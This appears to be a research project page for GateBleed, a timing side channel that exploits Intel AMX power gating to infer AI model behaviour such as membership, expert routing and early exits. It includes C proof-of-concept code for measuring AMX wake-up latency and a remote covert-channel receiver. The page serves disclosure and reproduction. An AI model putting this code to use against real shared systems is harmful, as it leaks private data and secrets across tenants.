GateBleed
Exploiting Power Gating for Stealthy AI Timing Attacks
A new hardware side channel that turns a power optimization into a high-signal timing leak, enabling the first hardware-only membership inference attack on AI accelerators.
Overview

GateBleed is a newly discovered microarchitectural side channel affecting Intel’s Advanced Matrix Extensions (AMX) and potentially other AI accelerators, including NVIDIA’s A100 GPU.
It exploits the staged power-gating mechanism designed to improve performance-per-watt in AI workloads.
When AMX or similar accelerators wake from deep power states, they incur a large, repeatable latency penalty — up to ~20,000 CPU cycles — which can be measured remotely and used to infer sensitive information.
Microarchitectural side-channel attacks exploit the specific implementation of a processor’s instruction-set architecture (e.g., x86, ARM). Unlike traditional malware, these attacks leverage benign code paths that unintentionally reveal information about a victim’s workload through measurable side effects. The landmark examples—Spectre and Meltdown (2018)—show how performance optimizations can be a double-edged sword: enabling high performance while simultaneously exposing systems to new classes of attacks.
The end of Dennard scaling, the principle that power density stays roughly constant as transistors shrink (so adding transistors did not mean adding power), has further complicated matters. To reduce power use, modern processors aggressively power-gate idle components. However, the resulting wake-up latency creates observable patterns that attackers can exploit to infer component usage.

AI workloads are similarly power-intensive. To cope, practitioners employ software-level model-gating optimizations such as early exiting and mixture-of-experts routing. GateBleed demonstrates that these optimizations introduce uneven hardware utilization, enabling privacy attacks against AI models; it is the first demonstration of data privacy being compromised through a power optimization. Unlike the speculation behind Spectre and Meltdown, which is a fundamentally bounded optimization, power gating and model gating are likely to become even more widespread as demand for ever-larger AI models grows in the post-Dennard-scaling era, increasing the reach of GateBleed attacks.
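To make the model-gating half of this concrete, below is a schematic, self-contained C sketch (our illustration, not code from the paper) of an early-exit inference loop. The confidence update, threshold, and layer count are invented placeholders; the point is that “easy” inputs leave the loop early, so the accelerator idles and power-gates sooner, which a later timing probe can detect.

```c
#include <stdio.h>

#define NUM_LAYERS     12
#define EXIT_THRESHOLD 0.30f   // invented placeholder

// Stand-in for one layer's matmuls; on real hardware this is where the
// AMX unit is kept powered while work flows through it.
static void run_layer(int layer, float *confidence) {
    (void)layer;
    *confidence += 0.08f;      // toy: each layer raises model confidence
}

// Returns how many layers actually executed for this input.
static int infer_with_early_exit(float confidence) {
    for (int layer = 0; layer < NUM_LAYERS; layer++) {
        run_layer(layer, &confidence);
        if (1.0f - confidence < EXIT_THRESHOLD)
            return layer + 1;  // early exit: remaining layers never run,
                               // so the accelerator idles and power-gates
    }
    return NUM_LAYERS;
}

int main(void) {
    // A familiar ("easy") input exits early; a hard one runs all layers.
    // Fewer layers means the accelerator goes cold sooner, and a later
    // probe observes the wake-up penalty.
    printf("easy input: %d layers\n", infer_with_early_exit(0.50f));
    printf("hard input: %d layers\n", infer_with_early_exit(0.05f));
    return 0;
}
```

In a real early-exit transformer the per-layer work is AMX tile matmuls and the exit test is an entropy threshold, but the control-flow shape, and hence the leakage, is the same.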
Our peer-reviewed paper, “GATEBLEED: Exploiting On-Core Accelerator Power Gating for High Performance & Stealthy Attacks on AI”, has been accepted at MICRO 2025.
Key Findings
- Power optimization backfire: Latency penalties from AMX’s cold-start wakeups create a strong timing signal.
- First hardware-only membership inference attack: 81% accuracy (0.89 precision) against an early-exit Transformer, with no access to logits or model outputs.
- Broader AI privacy impact:
  - 100% accurate Mixture-of-Experts (MoE) routing inference
  - Leakage of secret control-flow decisions across OS, VM, and SGX boundaries
- Cross-platform relevance: Preliminary tests confirm similar power-gating patterns on NVIDIA A100 GPUs.
How GateBleed Works
- Power Gating in AI Accelerators
  - To save energy, AMX units shut down between uses.
  - Waking from a deep power state takes significantly longer than waking from a shallow one.
- Measurable Latency Gap
  - The first matmul after wake-up pays a “cold-start” cost of ~20,000 cycles on AMX (see the measurement sketch after this list).
- Turning Latency into Leakage
  - By carefully scheduling and timing operations, an attacker can determine whether a model took a specific execution path (e.g., selected a particular MoE expert or exited early).
- Remote Feasibility
  - The signal remains robust over a one-hop network and, with our amplification gadget, achieves a 70,000× higher transmission rate than NetSpectre.
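The cold-start gap above is directly measurable from user space. Below is a minimal measurement sketch, not the paper’s artifact code: it assumes an AMX-capable Xeon, a kernel with AMX support (e.g., the 5.14.0-427 kernel the artifact uses), and gcc with `-O2 -mamx-tile -mamx-int8`; the 100 ms idle period and tile shapes are illustrative choices.

```c
#include <immintrin.h>
#include <x86intrin.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>

#define ARCH_REQ_XCOMP_PERM 0x1023  // request use of an XSAVE-managed feature
#define XFEATURE_XTILEDATA  18      // AMX tile data state

// 64-byte AMX tile configuration (palette 1 layout).
struct tilecfg {
    uint8_t  palette_id, start_row, reserved[14];
    uint16_t colsb[16];
    uint8_t  rows[16];
};

static int8_t  a[1024], b[1024];    // two 16-row x 64-byte int8 source tiles
static int32_t c[256];              // 16x16 int32 accumulator tile

// Time one tile load + int8 matmul + store, in TSC cycles.
static uint64_t time_one_matmul(void) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    _tile_loadd(1, a, 64);
    _tile_loadd(2, b, 64);
    _tile_dpbssd(0, 1, 2);          // c += a * b (int8 dot products)
    _tile_stored(0, c, 64);
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
}

int main(void) {
    // Ask the kernel for permission to use AMX tile state in this process.
    if (syscall(SYS_arch_prctl, ARCH_REQ_XCOMP_PERM, XFEATURE_XTILEDATA)) {
        perror("arch_prctl(ARCH_REQ_XCOMP_PERM)");
        return 1;
    }
    struct tilecfg cfg;
    memset(&cfg, 0, sizeof cfg);
    cfg.palette_id = 1;
    for (int i = 0; i < 8; i++) { cfg.colsb[i] = 64; cfg.rows[i] = 16; }
    _tile_loadconfig(&cfg);

    time_one_matmul();                    // first use: wake the unit
    uint64_t warm = time_one_matmul();    // immediately after: warm path
    usleep(100 * 1000);                   // idle long enough to power-gate
    uint64_t cold = time_one_matmul();    // first op after idling: cold path
    printf("warm: %llu cycles, cold: %llu cycles\n",
           (unsigned long long)warm, (unsigned long long)cold);
    _tile_release();
    return 0;
}
```

On affected parts, the cold measurement should exceed the warm one by roughly the staged wake-up penalty; in practice one repeats each case and compares medians to suppress scheduling noise.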
Impact
- Cloud AI deployments: Multi-tenant environments with shared accelerators are especially vulnerable.
- Privacy threats: Enables label leakage, membership inference, and watermark recovery without model outputs.
- Mitigation challenges: Standard defenses like cache partitioning, timer fuzzing, and speculation barriers are ineffective.
Technical Resources
Research Paper (arXiv Preprint)
Proof-of-Concept demo (MICRO artifact evaluation link — placeholder for now)
Intel PSIRT Guidance on Constant-Time Programming (note: does not mitigate MoE variant)
Artifact URL
https://github.com/jkalya/gatebleed
Badges Applied For
- Artifact Available
- Artifact Evaluated – Functional
- Results Reproduced
Hardware Dependencies (if any)
In our experiments, we used a Lenovo SRV-650 V3 server with UEFI version 3.14 and an Intel Xeon Gold 5420+ CPU, but any CPU with Intel AMX should work. For the remote system used in artifacts 03 and 04, any Intel x86 system running any Linux distribution will do.
Software Dependency (if any)
We found the attack works best on Linux kernel version 5.14.0-427; later kernel versions do not expose as many performance stages. We tested on both RHEL 9.4 and Ubuntu 22.04. Running 02_performance_stages_in_sgx requires the Intel SGX SDK, available at https://github.com/intel/linux-sgx. We use Python 3.9.21, but any version of Python 3 should work. The remaining artifacts have no external dependencies.
Key Results to be Reproduced
01 – Observation of the performance stages that constitute the backbone of the GATEBLEED attack
02 – Observation of these performance stages even within an Intel SGX enclave, making GATEBLEED exploitable within SGX
03 – Remote GATEBLEED covert channel. The server sends a “0” by not running an AMX operation and a “1” by running one. The client then requests a server endpoint that unconditionally runs an AMX operation and measures the response time, inferring whether the server used AMX recently (see the receiver sketch after this list)
04 – Remote GATEBLEED Spectre-v1 attack. The attacking client knows of a branch on the victim server that conditionally executes an AMX operation based on the value of a secret bit
05 – Custom implementation of a transformer model that uses AMX whenever possible for inference. End-to-end inference runtime varies based on whether inference started while AMX was warm or cold
06 – Membership inference attack on an entropy-based early-exit transformer model
07 – Membership inference attack on an early-exit CNN model
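For intuition about artifact 03, the receiver side of the covert channel can be sketched as below. This is our simplified illustration, not the artifact’s code: HOST, PORT, the one-line request format, and THRESHOLD_NS are hypothetical placeholders, and the threshold would be calibrated from measured warm/cold response-time distributions.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/socket.h>
#include <time.h>
#include <unistd.h>

#define HOST "192.0.2.1"      // hypothetical victim server address
#define PORT 8080             // hypothetical endpoint port
#define THRESHOLD_NS 250000LL // placeholder: midpoint of warm/cold medians

// Time one request to the endpoint that unconditionally runs an AMX op.
// Returns the round-trip time in nanoseconds, or -1 on connection failure.
static int64_t time_probe_ns(void) {
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in sa = { .sin_family = AF_INET, .sin_port = htons(PORT) };
    inet_pton(AF_INET, HOST, &sa.sin_addr);
    if (connect(fd, (struct sockaddr *)&sa, sizeof sa) != 0) {
        close(fd);
        return -1;
    }
    char buf[64];
    struct timespec t0, t1;
    clock_gettime(CLOCK_MONOTONIC, &t0);
    send(fd, "probe\n", 6, 0);       // triggers one AMX op server-side
    recv(fd, buf, sizeof buf, 0);    // wait for the response
    clock_gettime(CLOCK_MONOTONIC, &t1);
    close(fd);
    return (t1.tv_sec - t0.tv_sec) * 1000000000LL + (t1.tv_nsec - t0.tv_nsec);
}

int main(void) {
    for (int bit = 0; bit < 8; bit++) {  // read 8 covert bits
        int64_t rtt = time_probe_ns();
        // Fast response => AMX was already warm => sender ran AMX => "1".
        // Connection failures read as 0 here; a real receiver would retry.
        printf("%d", rtt >= 0 && rtt < THRESHOLD_NS);
        usleep(200000);  // hypothetical spacing so the unit can re-gate
    }
    printf("\n");
    return 0;
}
```

A fast response means the probe found AMX already warm, i.e., the sender ran an AMX operation during that bit interval; the inter-bit delay gives the unit time to power-gate again before the next probe.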
Estimated Completion Time
40 minutes